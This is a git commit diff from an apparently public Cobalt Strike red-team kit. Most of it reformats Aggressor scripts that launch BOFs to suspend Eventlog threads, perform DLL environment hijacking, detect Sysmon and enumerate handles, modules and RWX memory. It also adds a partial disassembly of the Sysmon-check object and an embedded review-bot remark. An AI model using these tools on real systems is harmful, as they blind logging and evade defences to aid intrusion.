unknown 2 سال پیش
والد
کامیت
263c81c60d

+ 11 - 11
KIT/BlindEventlog/blindeventlog.cna

@@ -1,31 +1,31 @@
 # author REDMED-X
 
 beacon_command_register(
-	"blindeventlog", "Blind Eventlog by suspending its threads.\n",
-	"INFO:\nBlind Eventlog by suspending its threads. This technique requires elevated privileges.\nBe aware that all events, from the period the threads were suspended, will be pushed to Eventlog the moment the threads are resumed.\n\nOPTIONS:\n[suspend]: find and suspend all Eventlog threads and disrupt its functionality\n[resume]: find and resume all Eventlog threads and restore its functionality\n\n" .
-	"USAGE:\nblindeventlog <suspend | resume>\n\n");
+    "blindeventlog", "Blind Eventlog by suspending its threads.\n",
+    "INFO:\nBlind Eventlog by suspending its threads. This technique requires elevated privileges.\nBe aware that all events, from the period the threads were suspended, will be pushed to Eventlog the moment the threads are resumed.\n\nOPTIONS:\n[suspend]: find and suspend all Eventlog threads and disrupt its functionality\n[resume]: find and resume all Eventlog threads and restore its functionality\n\n" .
+    "USAGE:\nblindeventlog <suspend | resume>\n\n");
 
 
 alias blindeventlog {
     $bid = $1;
     $action = $2;
 
-	if ($action eq "suspend" || $action eq "resume") {
-	}
-	else {
-		berror($bid, "Please specify one of the following actions: suspend | resume\n");
-		return;
-	}
+    if ($action eq "suspend" || $action eq "resume") {
+    }
+    else {
+        berror($bid, "Please specify one of the following actions: suspend | resume\n");
+        return;
+    }
 	
     # Read in the right BOF file
     $handle = openf(script_resource("blindeventlog.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
+    # Pack our arguments
     $arg_data  = bof_pack($bid, "z", $action);
 
-	blog($bid, "Tasked to interact with Eventlog..");
+    blog($bid, "Tasked to interact with Eventlog..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

+ 12 - 13
KIT/DllEnvHijacking/dllenvhijacking.cna

@@ -9,26 +9,25 @@ beacon_command_register(
 alias dllenvhijacking {
     $bid = $1;
     $sysroot = $2;
-	$proxydll = $3;
-	$pathtodll = $4;
-	$vulnbinary = $5;
-	$pid = $6;
-
-	if ($sysroot eq "" || $proxydll eq "" || $pathtodll eq "" || $vulnbinary eq "" || $pid eq "") {
-		berror($bid, "Please make sure that all the arguments are filled in and correct!\n");
-		return;
-	}
-	
+    $proxydll = $3;
+    $pathtodll = $4;
+    $vulnbinary = $5;
+    $pid = $6;
+
+    if ($sysroot eq "" || $proxydll eq "" || $pathtodll eq "" || $vulnbinary eq "" || $pid eq "") {
+        berror($bid, "Please make sure that all the arguments are filled in and correct!\n");
+        return;
+    }
+
     # Read in the right BOF file
     $handle = openf(script_resource("dllenvhijacking.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
+    # Pack our arguments
     $arg_data  = bof_pack($bid, "ZZZzi", $sysroot, $proxydll, $pathtodll, $vulnbinary, $pid);
-	
 
-	blog($bid, "Tasked execute DLL Environment hijacking..");
+    blog($bid, "Tasked execute DLL Environment hijacking..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

+ 6 - 6
KIT/FindDotnet/finddotnet.cna

@@ -1,9 +1,9 @@
 # author REDMED-X
 
 beacon_command_register(
-	"finddotnet", "Find processes that most likely have .NET loaded.",
-	"INFO:\nFind processes that most likely have .NET loaded by searching for the section name: \BaseNamedObjects\Cor_Private_IPCBlock(_v4)_<ProcessId>\n\n" .
-	"USAGE:\nfinddotnet\n\n");
+    "finddotnet", "Find processes that most likely have .NET loaded.",
+    "INFO:\nFind processes that most likely have .NET loaded by searching for the section name: \BaseNamedObjects\Cor_Private_IPCBlock(_v4)_<ProcessId>\n\n" .
+    "USAGE:\nfinddotnet\n\n");
 
 
 alias finddotnet {
@@ -13,9 +13,9 @@ alias finddotnet {
     $handle = openf(script_resource("finddotnet.o"));
     $data   = readb($handle, -1);
     closef($handle);
-    
-	blog($bid, "Tasked to search for processes that have .NET loaded..");
-	
+
+    blog($bid, "Tasked to search for processes that have .NET loaded..");
+
     beacon_inline_execute($bid, $data, "go", $null);
 }
 

+ 42 - 43
KIT/FindHandle/findhandle.cna

@@ -1,62 +1,61 @@
 # author REDMED-X
 
 beacon_command_register(
-	"findhandle", "Find process and thread handle types between processes.",
-	"INFO:\nFind process and thread handle types between processes.\n\nOPTIONS:\n[all]: list all processes with handles to all other processes\n[h2p]: list all processes that have a handle to a specific process\n[p2h]: list handles from a specific process to all other processes\n\nHandle Query Options:\n[proc]: search for PROCESS type handles\n[thread]: search for THREAD type handles\n\nTargeted Search Options:\n[<pid>]: for both the [h2p] and [p2h] search options, specify the PID of the process your interested in.\n\n" .
-	"USAGE:\nfindhandle all <proc | thread>\nfindhandle h2p <proc | thread> <pid>\nfindhandle p2h <proc | thread> <pid>\n\n");
+    "findhandle", "Find process and thread handle types between processes.",
+    "INFO:\nFind process and thread handle types between processes.\n\nOPTIONS:\n[all]: list all processes with handles to all other processes\n[h2p]: list all processes that have a handle to a specific process\n[p2h]: list handles from a specific process to all other processes\n\nHandle Query Options:\n[proc]: search for PROCESS type handles\n[thread]: search for THREAD type handles\n\nTargeted Search Options:\n[<pid>]: for both the [h2p] and [p2h] search options, specify the PID of the process your interested in.\n\n" .
+    "USAGE:\nfindhandle all <proc | thread>\nfindhandle h2p <proc | thread> <pid>\nfindhandle p2h <proc | thread> <pid>\n\n");
 
 
 alias findhandle {
     $bid = $1;
     $search = $2;
     $query = $3;
-	$pid = $4;
-	
-	if ($search eq "") {
-		berror($bid, "Please specify one of the following seach options: all | h2p | p2h\n");
-		return;
-	}
-	
-	if ($search eq "all" || $search eq "h2p" || $search eq "p2h") {
-		if ($query eq "") {
-			berror($bid, "Please specify one of the following handle types to search for: proc | thread\n");
-			return;
-		}
-		if ($query eq "proc" || $query eq "thread") {
-		
-			if ($search eq "h2p" && $pid eq "" ) {
-				berror($bid, "Please specify the pid to target a specific process.\n");
-				return;
-			}
-			if ($search eq "p2h" && $pid eq "" ) {
-				berror($bid, "Please specify the pid to target a specific process.\n");
-				return;
-			}
-		}
-		else {
-			berror($bid, "This handle type isn't supported. Please specify one of the following handle types to search for: proc | thread\n");
-			return;
-		}
-	}
-	else {
-		berror($bid, "This option isn't supported. Please specify one of the following seach options: all | h2p | p2h\n");
-		return;
-	}
+    $pid = $4;
+
+    if ($search eq "") {
+        berror($bid, "Please specify one of the following seach options: all | h2p | p2h\n");
+        return;
+    }
+
+    if ($search eq "all" || $search eq "h2p" || $search eq "p2h") {
+        if ($query eq "") {
+            berror($bid, "Please specify one of the following handle types to search for: proc | thread\n");
+            return;
+        }
+        if ($query eq "proc" || $query eq "thread") {
+            if ($search eq "h2p" && $pid eq "" ) {
+                berror($bid, "Please specify the pid to target a specific process.\n");
+                return;
+            }
+            if ($search eq "p2h" && $pid eq "" ) {
+                berror($bid, "Please specify the pid to target a specific process.\n");
+                return;
+            }
+        }
+        else {
+            berror($bid, "This handle type isn't supported. Please specify one of the following handle types to search for: proc | thread\n");
+            return;
+        }
+    }
+    else {
+        berror($bid, "This option isn't supported. Please specify one of the following seach options: all | h2p | p2h\n");
+        return;
+    }
 	
     # Read in the right BOF file
     $handle = openf(script_resource("findhandle.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
-	if ($pid eq "") {
-       $arg_data  = bof_pack($bid, "zz", $search, $query);
+    # Pack our arguments
+    if ($pid eq "") {
+        $arg_data  = bof_pack($bid, "zz", $search, $query);
     }
-	else {
-		$arg_data  = bof_pack($bid, "zzi", $search, $query, $pid);
-	}
-	
-	blog($bid, "Tasked to enumerate handles..");
+    else {
+        $arg_data  = bof_pack($bid, "zzi", $search, $query, $pid);
+    }
+
+    blog($bid, "Tasked to enumerate handles..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

+ 31 - 35
KIT/FindLib/findlib.cna

@@ -1,9 +1,9 @@
 # author REDMED-X
 
 beacon_command_register(
-	"findlib", "Find loaded module(s) in remote process(es)",
-	"INFO:\nFind a specific loaded module in all processes OR list all loaded modules in a specific process.\n\nOPTIONS:\n[search]: find all processes that have loaded a specific module (e.g. winhttp.dll or ws2_32.dll).\n[list]: list all loaded modules in a remote process.\n\n" .
-	"USAGE:\nfindlib search <module name>\nfindlib list <pid>\n\n");
+    "findlib", "Find loaded module(s) in remote process(es)",
+    "INFO:\nFind a specific loaded module in all processes OR list all loaded modules in a specific process.\n\nOPTIONS:\n[search]: find all processes that have loaded a specific module (e.g. winhttp.dll or ws2_32.dll).\n[list]: list all loaded modules in a remote process.\n\n" .
+    "USAGE:\nfindlib search <module name>\nfindlib list <pid>\n\n");
 	
 
 
@@ -12,45 +12,41 @@ alias findlib {
     $option = $2;
     $target = $3;
 
-	if ($option eq "") {
-		berror($bid, "Please specify one of the following enumeration options: search | list\n");
-		return;
-	}
-	
-	if ($option eq "search" || $option eq "list") {
-	
-		if ($option eq "search" && $target eq "") {
-			berror($bid, "Please specify a module name to search for\n");
-			return;
-		}
-		
-		if ($option eq "list" && $target eq "") {
-			berror($bid, "Please specify the pid of the target process to enumerate\n");
-			return;
-		}
-	}
-	else {
-		berror($bid, "This enumeration option isn't supported. Please specify one of the following enumeration options: search | list\n");
-		return;
-	}
-	
+    if ($option eq "") {
+        berror($bid, "Please specify one of the following enumeration options: search | list\n");
+        return;
+    }
+
+    if ($option eq "search" || $option eq "list") {
+        if ($option eq "search" && $target eq "") {
+            berror($bid, "Please specify a module name to search for\n");
+            return;
+        }
+
+        if ($option eq "list" && $target eq "") {
+            berror($bid, "Please specify the pid of the target process to enumerate\n");
+            return;
+        }
+    }
+    else {
+        berror($bid, "This enumeration option isn't supported. Please specify one of the following enumeration options: search | list\n");
+        return;
+    }
+
     # Read in the right BOF file
     $handle = openf(script_resource("findlib.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
-	if ($option eq "search") {
+    # Pack our arguments
+    if ($option eq "search") {
        $arg_data  = bof_pack($bid, "zz", $option, $target);
     }
-	else {
-		$arg_data  = bof_pack($bid, "zi", $option, $target);
-	}
-	
-	#btask($1, "arg 1: $+  $option");
-	#btask($1, "arg 2: $+  $target");
-	
-	blog($bid, "Tasked to enumerate loaded modules..");
+    else {
+        $arg_data  = bof_pack($bid, "zi", $option, $target);
+    }
+
+    blog($bid, "Tasked to enumerate loaded modules..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

+ 12 - 12
KIT/FindRWX/findrwx.cna

@@ -1,19 +1,19 @@
 # author REDMED-X
 
 beacon_command_register(
-	"findrwx", "Find RWX memory regions in a target process.",
-	"INFO:\nFind processes that already have memory allocated for read/write/execute (like most .NET processes)\n\nOPTIONS:\n[pid]: target process to enumerate\n\n" .
-	"USAGE:\nfindrwx <pid>\n\n");
+    "findrwx", "Find RWX memory regions in a target process.",
+    "INFO:\nFind processes that already have memory allocated for read/write/execute (like most .NET processes)\n\nOPTIONS:\n[pid]: target process to enumerate\n\n" .
+    "USAGE:\nfindrwx <pid>\n\n");
 
 alias findrwx {
     $bid = $1;
-	$pid = $2;
+    $pid = $2;
+
+    if ($pid eq "") {
+        berror($bid, "Please make sure that the PID of the target process is specified.");
+        return;
+    }
 
-	if ($pid eq "") {
-		berror($bid, "Please make sure that the PID of the target process is specified.");
-		return;
-	}
-	
     # Read in the right BOF file
     $handle = openf(script_resource("findrwx.o"));
     $data   = readb($handle, -1);
@@ -21,9 +21,9 @@ alias findrwx {
 
     # Pack our arguments
     $arg_data  = bof_pack($bid, "i", $pid);
-    
-	blog($bid, "Tasked to verify if the target process has RWX memory regions..");
-	
+
+    blog($bid, "Tasked to verify if the target process has RWX memory regions..");
+
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

+ 1 - 3
KIT/FindSysmon/findsysmon.c

@@ -323,7 +323,7 @@ int go(char *args, int len) {
 	if (MSVCRT$strcmp(action, "reg") == 0) {
 		res = FindSysmon();
 		if(!res) {
-			BeaconPrintf(CALLBACK_ERROR, "[+] No Sysmon service found :)\n");
+			BeaconPrintf(CALLBACK_OUTPUT, "[+] No Sysmon service found :)\n");
 			return 0;
 		}
 		else  {
@@ -351,5 +351,3 @@ int go(char *args, int len) {
 }
 
 
-
-
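Review bot: The switch from CALLBACK_ERROR to CALLBACK_OUTPUT on the "No Sysmon service found" line is the right classification — an absent service is a successful query result, not a failure — but nothing in the code records that reasoning, so a later edit could just as easily flip it back. A one-line comment above the call would pin it: `// Not found is a normal query result, not an error: report it on the output stream`. The enclosing `go` function starts and ends outside the hunk, so the `else` branch and the driver path are not visible; presumably they use the same output/error split for found-vs-failed, which is worth confirming while here. The second hunk only trims trailing blank lines at end of file.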

+ 12 - 12
KIT/FindSysmon/findsysmon.cna

@@ -1,31 +1,31 @@
 # author REDMED-X
 
 beacon_command_register(
-	"findsysmon", "Verify if Sysmon is running.\n",
-	"INFO:\nVerify if Sysmon is running. This can be done by checking the registry or by enumerating Minifilter drivers and search for one that is associated with Sysmon.\n\nOPTIONS:\n[reg]: search the registry to check if Sysmon is present on the system and return the Sysmon service PID if active.\n[driver]: list all the Minifilter drivers on the system to check manually (requires elevated privileges).\n\n" .
-	"USAGE:\nfindsysmon <reg | driver>\n\n");
+    "findsysmon", "Verify if Sysmon is running.\n",
+    "INFO:\nVerify if Sysmon is running. This can be done by checking the registry or by enumerating Minifilter drivers and search for one that is associated with Sysmon.\n\nOPTIONS:\n[reg]: search the registry to check if Sysmon is present on the system and return the Sysmon service PID if active.\n[driver]: list all the Minifilter drivers on the system to check manually (requires elevated privileges).\n\n" .
+    "USAGE:\nfindsysmon <reg | driver>\n\n");
 
 
 alias findsysmon {
     $bid = $1;
     $action = $2;
 
-	if ($action eq "reg" || $action eq "driver") {
-	}
-	else {
-		berror($bid, "Please specify one of the following enumeration options: reg | driver\n");
-		return;
-	}
-	
+    if ($action eq "reg" || $action eq "driver") {
+    }
+    else {
+        berror($bid, "Please specify one of the following enumeration options: reg | driver\n");
+        return;
+    }
+
     # Read in the right BOF file
     $handle = openf(script_resource("findsysmon.o"));
     $data   = readb($handle, -1);
     closef($handle);
 
-	# Pack our arguments
+    # Pack our arguments
     $arg_data  = bof_pack($bid, "z", $action);
 
-	blog($bid, "Tasked to find Sysmon..");
+    blog($bid, "Tasked to find Sysmon..");
     beacon_inline_execute($bid, $data, "go", $arg_data);
 }
 

+ 930 - 0
KIT/FindSysmon/findsysmon.disasm

@@ -0,0 +1,930 @@
+Microsoft (R) COFF/PE Dumper Version 14.29.30148.0
+Copyright (C) Microsoft Corporation.  All rights reserved.
+
+
+Dump of file findsysmon.o
+
+File Type: COFF OBJECT
+
+BeaconPrintToStreamW:
+  0000000000000000: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  0000000000000005: 48 89 54 24 10     mov         qword ptr [rsp+10h],rdx
+  000000000000000A: 4C 89 44 24 18     mov         qword ptr [rsp+18h],r8
+  000000000000000F: 4C 89 4C 24 20     mov         qword ptr [rsp+20h],r9
+  0000000000000014: 48 83 EC 58        sub         rsp,58h
+  0000000000000018: C7 44 24 30 01 00  mov         dword ptr [rsp+30h],1
+                    00 00
+  0000000000000020: C7 44 24 34 00 00  mov         dword ptr [rsp+34h],0
+                    00 00
+  0000000000000028: 48 83 3D 00 00 00  cmp         qword ptr [g_lpStream],1
+                    00 01
+  0000000000000030: 77 28              ja          000000000000005A
+  0000000000000032: 4C 8D 05 00 00 00  lea         r8,[g_lpStream]
+                    00
+  0000000000000039: BA 01 00 00 00     mov         edx,1
+  000000000000003E: 33 C9              xor         ecx,ecx
+  0000000000000040: FF 15 00 00 00 00  call        qword ptr [__imp_OLE32$CreateStreamOnHGlobal]
+  0000000000000046: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000004A: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  000000000000004F: 7D 09              jge         000000000000005A
+  0000000000000051: 8B 44 24 30        mov         eax,dword ptr [rsp+30h]
+  0000000000000055: E9 01 01 00 00     jmp         000000000000015B
+  000000000000005A: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],1
+                    00 01
+  0000000000000062: 77 2E              ja          0000000000000092
+  0000000000000064: BA 02 00 00 00     mov         edx,2
+  0000000000000069: B9 00 20 00 00     mov         ecx,2000h
+  000000000000006E: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$calloc]
+  0000000000000074: 48 89 05 00 00 00  mov         qword ptr [g_lpwPrintBuffer],rax
+                    00
+  000000000000007B: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],0
+                    00 00
+  0000000000000083: 75 0D              jne         0000000000000092
+  0000000000000085: C7 44 24 30 05 40  mov         dword ptr [rsp+30h],80004005h
+                    00 80
+  000000000000008D: E9 9D 00 00 00     jmp         000000000000012F
+  0000000000000092: 48 8D 44 24 68     lea         rax,[rsp+68h]
+  0000000000000097: 48 89 44 24 38     mov         qword ptr [rsp+38h],rax
+  000000000000009C: 48 8B 44 24 38     mov         rax,qword ptr [rsp+38h]
+  00000000000000A1: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  00000000000000A6: 4C 8B 4C 24 60     mov         r9,qword ptr [rsp+60h]
+  00000000000000AB: 41 B8 FF 1F 00 00  mov         r8d,1FFFh
+  00000000000000B1: BA 00 20 00 00     mov         edx,2000h
+  00000000000000B6: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  00000000000000BD: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$_vsnwprintf_s]
+  00000000000000C3: 85 C0              test        eax,eax
+  00000000000000C5: 75 0A              jne         00000000000000D1
+  00000000000000C7: C7 44 24 30 05 40  mov         dword ptr [rsp+30h],80004005h
+                    00 80
+  00000000000000CF: EB 5E              jmp         000000000000012F
+  00000000000000D1: 48 83 3D 00 00 00  cmp         qword ptr [g_lpStream],0
+                    00 00
+  00000000000000D9: 74 4C              je          0000000000000127
+  00000000000000DB: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  00000000000000E2: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$wcslen]
+  00000000000000E8: 8B C0              mov         eax,eax
+  00000000000000EA: 48 D1 E0           shl         rax,1
+  00000000000000ED: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  00000000000000F4: 48 8B 09           mov         rcx,qword ptr [rcx]
+  00000000000000F7: 48 89 4C 24 40     mov         qword ptr [rsp+40h],rcx
+  00000000000000FC: 4C 8D 4C 24 34     lea         r9,[rsp+34h]
+  0000000000000101: 44 8B C0           mov         r8d,eax
+  0000000000000104: 48 8B 15 00 00 00  mov         rdx,qword ptr [g_lpwPrintBuffer]
+                    00
+  000000000000010B: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000112: 48 8B 44 24 40     mov         rax,qword ptr [rsp+40h]
+  0000000000000117: FF 50 20           call        qword ptr [rax+20h]
+  000000000000011A: 89 44 24 30        mov         dword ptr [rsp+30h],eax
+  000000000000011E: 83 7C 24 30 00     cmp         dword ptr [rsp+30h],0
+  0000000000000123: 7D 02              jge         0000000000000127
+  0000000000000125: EB 08              jmp         000000000000012F
+  0000000000000127: C7 44 24 30 00 00  mov         dword ptr [rsp+30h],0
+                    00 00
+  000000000000012F: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],0
+                    00 00
+  0000000000000137: 74 15              je          000000000000014E
+  0000000000000139: 41 B8 00 40 00 00  mov         r8d,4000h
+  000000000000013F: 33 D2              xor         edx,edx
+  0000000000000141: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  0000000000000148: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$memset]
+  000000000000014E: 48 C7 44 24 38 00  mov         qword ptr [rsp+38h],0
+                    00 00 00
+  0000000000000157: 8B 44 24 30        mov         eax,dword ptr [rsp+30h]
+  000000000000015B: 48 83 C4 58        add         rsp,58h
+  000000000000015F: C3                 ret
+  0000000000000160: CC                 int         3
+  0000000000000161: CC                 int         3
+  0000000000000162: CC                 int         3
+  0000000000000163: CC                 int         3
+  0000000000000164: CC                 int         3
+  0000000000000165: CC                 int         3
+  0000000000000166: CC                 int         3
+  0000000000000167: CC                 int         3
+  0000000000000168: CC                 int         3
+  0000000000000169: CC                 int         3
+  000000000000016A: CC                 int         3
+  000000000000016B: CC                 int         3
+  000000000000016C: CC                 int         3
+  000000000000016D: CC                 int         3
+  000000000000016E: CC                 int         3
+  000000000000016F: CC                 int         3
+BeaconOutputStreamW:
+  0000000000000170: 40 57              push        rdi
+  0000000000000172: 48 81 EC A0 00 00  sub         rsp,0A0h
+                    00
+  0000000000000179: 48 8D 44 24 50     lea         rax,[rsp+50h]
+  000000000000017E: 48 8B F8           mov         rdi,rax
+  0000000000000181: 33 C0              xor         eax,eax
+  0000000000000183: B9 50 00 00 00     mov         ecx,50h
+  0000000000000188: F3 AA              rep stos    byte ptr [rdi]
+  000000000000018A: 48 C7 44 24 30 00  mov         qword ptr [rsp+30h],0
+                    00 00 00
+  0000000000000193: C7 44 24 28 00 00  mov         dword ptr [rsp+28h],0
+                    00 00
+  000000000000019B: 48 C7 44 24 20 00  mov         qword ptr [rsp+20h],0
+                    00 00 00
+  00000000000001A4: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  00000000000001AB: 48 8B 00           mov         rax,qword ptr [rax]
+  00000000000001AE: 41 B8 01 00 00 00  mov         r8d,1
+  00000000000001B4: 48 8D 54 24 50     lea         rdx,[rsp+50h]
+  00000000000001B9: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  00000000000001C0: FF 50 60           call        qword ptr [rax+60h]
+  00000000000001C3: 85 C0              test        eax,eax
+  00000000000001C5: 7D 05              jge         00000000000001CC
+  00000000000001C7: E9 13 01 00 00     jmp         00000000000002DF
+  00000000000001CC: 8B 44 24 60        mov         eax,dword ptr [rsp+60h]
+  00000000000001D0: 48 89 44 24 30     mov         qword ptr [rsp+30h],rax
+  00000000000001D5: 48 8B 44 24 30     mov         rax,qword ptr [rsp+30h]
+  00000000000001DA: 48 FF C0           inc         rax
+  00000000000001DD: 48 89 44 24 38     mov         qword ptr [rsp+38h],rax
+  00000000000001E2: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  00000000000001E8: 48 8B 4C 24 38     mov         rcx,qword ptr [rsp+38h]
+  00000000000001ED: 4C 8B C1           mov         r8,rcx
+  00000000000001F0: BA 08 00 00 00     mov         edx,8
+  00000000000001F5: 48 8B C8           mov         rcx,rax
+  00000000000001F8: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapAlloc]
+  00000000000001FE: 48 89 44 24 20     mov         qword ptr [rsp+20h],rax
+  0000000000000203: 48 83 7C 24 20 00  cmp         qword ptr [rsp+20h],0
+  0000000000000209: 74 6B              je          0000000000000276
+  000000000000020B: 48 C7 44 24 40 00  mov         qword ptr [rsp+40h],0
+                    00 00 00
+  0000000000000214: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  000000000000021B: 48 8B 00           mov         rax,qword ptr [rax]
+  000000000000021E: 45 33 C9           xor         r9d,r9d
+  0000000000000221: 45 33 C0           xor         r8d,r8d
+  0000000000000224: 48 8B 54 24 40     mov         rdx,qword ptr [rsp+40h]
+  0000000000000229: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000230: FF 50 28           call        qword ptr [rax+28h]
+  0000000000000233: 85 C0              test        eax,eax
+  0000000000000235: 7D 02              jge         0000000000000239
+  0000000000000237: EB 3D              jmp         0000000000000276
+  0000000000000239: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  0000000000000240: 48 8B 00           mov         rax,qword ptr [rax]
+  0000000000000243: 4C 8D 4C 24 28     lea         r9,[rsp+28h]
+  0000000000000248: 44 8B 44 24 30     mov         r8d,dword ptr [rsp+30h]
+  000000000000024D: 48 8B 54 24 20     mov         rdx,qword ptr [rsp+20h]
+  0000000000000252: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000259: FF 50 18           call        qword ptr [rax+18h]
+  000000000000025C: 85 C0              test        eax,eax
+  000000000000025E: 7D 02              jge         0000000000000262
+  0000000000000260: EB 14              jmp         0000000000000276
+  0000000000000262: 4C 8B 44 24 20     mov         r8,qword ptr [rsp+20h]
+  0000000000000267: 48 8D 15 00 00 00  lea         rdx,[$SG105135]
+                    00
+  000000000000026E: 33 C9              xor         ecx,ecx
+  0000000000000270: FF 15 00 00 00 00  call        qword ptr [__imp_BeaconPrintf]
+  0000000000000276: 48 83 3D 00 00 00  cmp         qword ptr [g_lpStream],0
+                    00 00
+  000000000000027E: 74 1F              je          000000000000029F
+  0000000000000280: 48 8B 05 00 00 00  mov         rax,qword ptr [g_lpStream]
+                    00
+  0000000000000287: 48 8B 00           mov         rax,qword ptr [rax]
+  000000000000028A: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpStream]
+                    00
+  0000000000000291: FF 50 10           call        qword ptr [rax+10h]
+  0000000000000294: 48 C7 05 00 00 00  mov         qword ptr [g_lpStream],0
+                    00 00 00 00 00
+  000000000000029F: 48 83 3D 00 00 00  cmp         qword ptr [g_lpwPrintBuffer],0
+                    00 00
+  00000000000002A7: 74 18              je          00000000000002C1
+  00000000000002A9: 48 8B 0D 00 00 00  mov         rcx,qword ptr [g_lpwPrintBuffer]
+                    00
+  00000000000002B0: FF 15 00 00 00 00  call        qword ptr [__imp_MSVCRT$free]
+  00000000000002B6: 48 C7 05 00 00 00  mov         qword ptr [g_lpwPrintBuffer],0
+                    00 00 00 00 00
+  00000000000002C1: 48 83 7C 24 20 00  cmp         qword ptr [rsp+20h],0
+  00000000000002C7: 74 16              je          00000000000002DF
+  00000000000002C9: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$GetProcessHeap]
+  00000000000002CF: 4C 8B 44 24 20     mov         r8,qword ptr [rsp+20h]
+  00000000000002D4: 33 D2              xor         edx,edx
+  00000000000002D6: 48 8B C8           mov         rcx,rax
+  00000000000002D9: FF 15 00 00 00 00  call        qword ptr [__imp_KERNEL32$HeapFree]
+  00000000000002DF: 48 81 C4 A0 00 00  add         rsp,0A0h
+                    00
+  00000000000002E6: 5F                 pop         rdi
+  00000000000002E7: C3                 ret
+  00000000000002E8: CC                 int         3
+  00000000000002E9: CC                 int         3
+  00000000000002EA: CC                 int         3
+  00000000000002EB: CC                 int         3
+  00000000000002EC: CC                 int         3
+  00000000000002ED: CC                 int         3
+  00000000000002EE: CC                 int         3
+  00000000000002EF: CC                 int         3
+PrintSysmonPID:
+  00000000000002F0: 48 89 4C 24 08     mov         qword ptr [rsp+8],rcx
+  00000000000002F5: 48 81 EC E8 00 00  sub         rsp,0E8h
+                    00
+  00000000000002FC: C7 44 24 30 00 00  mov         dword ptr [rsp+30h],0
+                    00 00
+  0000000000000304: 48 C7 44 24 40 00  mov         qword ptr [rsp+40h],0
+                    00 00 00
+  000000000000030D: C7 44 24 70 13 75  mov         dword ptr [rsp+70h],3837513h
+                    83 03
+  0000000000000315: B8 8B 09 00 00     mov         eax,98Bh
+  000000000000031A: 66 89 44 24 74     mov         word ptr [rsp+74h],ax
+  000000000000031F: B8 D8 11 00 00     mov         eax,11D8h
+  0000000000000324: 66 89 44 24 76     mov         word ptr [rsp+76h],ax
+  0000000000000329: C6 44 24 78 94     mov         byte ptr [rsp+78h],94h
+  000000000000032E: C6 44 24 79 14     mov         byte ptr [rsp+79h],14h
+  0000000000000333: C6 44 24 7A 50     mov         byte ptr [rsp+7Ah],50h
+  0000000000000338: C6 44 24 7B 50     mov         byte ptr [rsp+7Bh],50h
+  000000000000033D: C6 44 24 7C 54     mov         byte ptr [rsp+7Ch],54h
+  0000000000000342: C6 44 24 7D 50     mov         byte ptr [rsp+7Dh],50h
+  0000000000000347: C6 44 24 7E 30     mov         byte ptr [rsp+7Eh],30h
+  000000000000034C: C6 44 24 7F 30     mov         byte ptr [rsp+7Fh],30h
+  0000000000000351: C7 44 24 60 12 75  mov         dword ptr [rsp+60h],3837512h
+                    83 03
+  0000000000000359: B8 8B 09 00 00     mov         eax,98Bh
+  000000000000035E: 66 89 44 24 64     mov         word ptr [rsp+64h],ax
+  0000000000000363: B8 D8 11 00 00     mov         eax,11D8h
+  0000000000000368: 66 89 44 24 66     mov         word ptr [rsp+66h],ax
+  000000000000036D: C6 44 24 68 94     mov         byte ptr [rsp+68h],94h
+  0000000000000372: C6 44 24 69 14     mov         byte ptr [rsp+69h],14h
+  0000000000000377: C6 44 24 6A 50     mov         byte ptr [rsp+6Ah],50h
+  000000000000037C: C6 44 24 6B 50     mov         byte ptr [rsp+6Bh],50h
+  0000000000000381: C6 44 24 6C 54     mov         byte ptr [rsp+6Ch],54h
+  0000000000000386: C6 44 24 6D 50     mov         byte ptr [rsp+6Dh],50h
+  000000000000038B: C6 44 24 6E 30     mov         byte ptr [rsp+6Eh],30h
+  0000000000000390: C6 44 24 6F 30     mov         byte ptr [rsp+6Fh],30h
+  0000000000000395: C7 84 24 80 00 00  mov         dword ptr [rsp+80h],20404h
+                    00 04 04 02 00
+  00000000000003A0: 33 C0              xor         eax,eax
+  00000000000003A2: 66 89 84 24 84 00  mov         word ptr [rsp+84h],ax
+                    00 00
+  00000000000003AA: 33 C0              xor         eax,eax
+  00000000000003AC: 66 89 84 24 86 00  mov         word ptr [rsp+86h],ax
+                    00 00
+  00000000000003B4: C6 84 24 88 00 00  mov         byte ptr [rsp+88h],0C0h
+                    00 C0
